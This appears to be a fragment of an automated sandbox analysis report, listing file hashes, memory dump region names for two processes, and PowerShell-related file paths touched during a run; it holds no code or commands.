MD5 05d6d0c630f17ebc74482d37d08263e4
SHA1 51b31010af87e352edf506dbb7959aaa7f760740
SHA256 1e07f298a9cc7fb488184bf6eb311001fb82887d6d7fdc5ebb7e937cdc8d5948
SHA512 47d6a2ffc276b1a36da23025022fad15a33125f9c92fe1979ece5912a1e662443f5614f73cc2c8c853273174ebb6241165104812c452005429422ec0e7f44b8d

memory/1548-32-0x00007FFE8BD00000-0x00007FFE8BD0F000-memory.dmp

memory/1548-30-0x00007FFE8A620000-0x00007FFE8A643000-memory.dmp

memory/1548-54-0x00007FFE87510000-0x00007FFE8753D000-memory.dmp

memory/1548-56-0x00007FFE87120000-0x00007FFE87139000-memory.dmp

memory/1548-58-0x00007FFE870F0000-0x00007FFE87113000-memory.dmp

memory/1548-60-0x00007FFE76E50000-0x00007FFE76FBF000-memory.dmp

memory/1548-64-0x00007FFE8A7C0000-0x00007FFE8A7CD000-memory.dmp

memory/1548-63-0x00007FFE870D0000-0x00007FFE870E9000-memory.dmp

memory/1548-66-0x00007FFE870A0000-0x00007FFE870CE000-memory.dmp

memory/1548-73-0x00007FFE76AD0000-0x00007FFE76E45000-memory.dmp

memory/1548-74-0x00000250838B0000-0x0000025083C25000-memory.dmp

memory/1548-71-0x00007FFE8A620000-0x00007FFE8A643000-memory.dmp

memory/1548-70-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

memory/1548-78-0x00007FFE87090000-0x00007FFE8709D000-memory.dmp

memory/1548-76-0x00007FFE86F00000-0x00007FFE86F14000-memory.dmp

memory/1548-69-0x00007FFE86F20000-0x00007FFE86FD8000-memory.dmp

memory/1548-80-0x00007FFE769B0000-0x00007FFE76ACC000-memory.dmp

memory/1548-81-0x00007FFE870F0000-0x00007FFE87113000-memory.dmp

memory/4948-82-0x00007FFE75E33000-0x00007FFE75E35000-memory.dmp

memory/4948-92-0x0000013EDC5B0000-0x0000013EDC5D2000-memory.dmp

memory/4948-93-0x00007FFE75E30000-0x00007FFE768F1000-memory.dmp

memory/1548-94-0x00007FFE76E50000-0x00007FFE76FBF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxa4ggq5.p3n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4948-105-0x00007FFE75E30000-0x00007FFE768F1000-memory.dmp

memory/1548-106-0x00007FFE870D0000-0x00007FFE870E9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4948-112-0x00007FFE75E30000-0x00007FFE768F1000-memory.dmp

memory/1548-113-0x00007FFE870A0000-0x00007FFE870CE000-memory.dmp

memory/1548-114-0x00007FFE86F20000-0x00007FFE86FD8000-memory.dmp

memory/1548-115-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

memory/1548-130-0x00007FFE76AD0000-0x00007FFE76E45000-memory.dmp

memory/1548-116-0x00007FFE8A620000-0x00007FFE8A643000-memory.dmp

memory/1548-131-0x00000250838B0000-0x0000025083C25000-memory.dmp

memory/1548-132-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

memory/1548-160-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

memory/1548-175-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp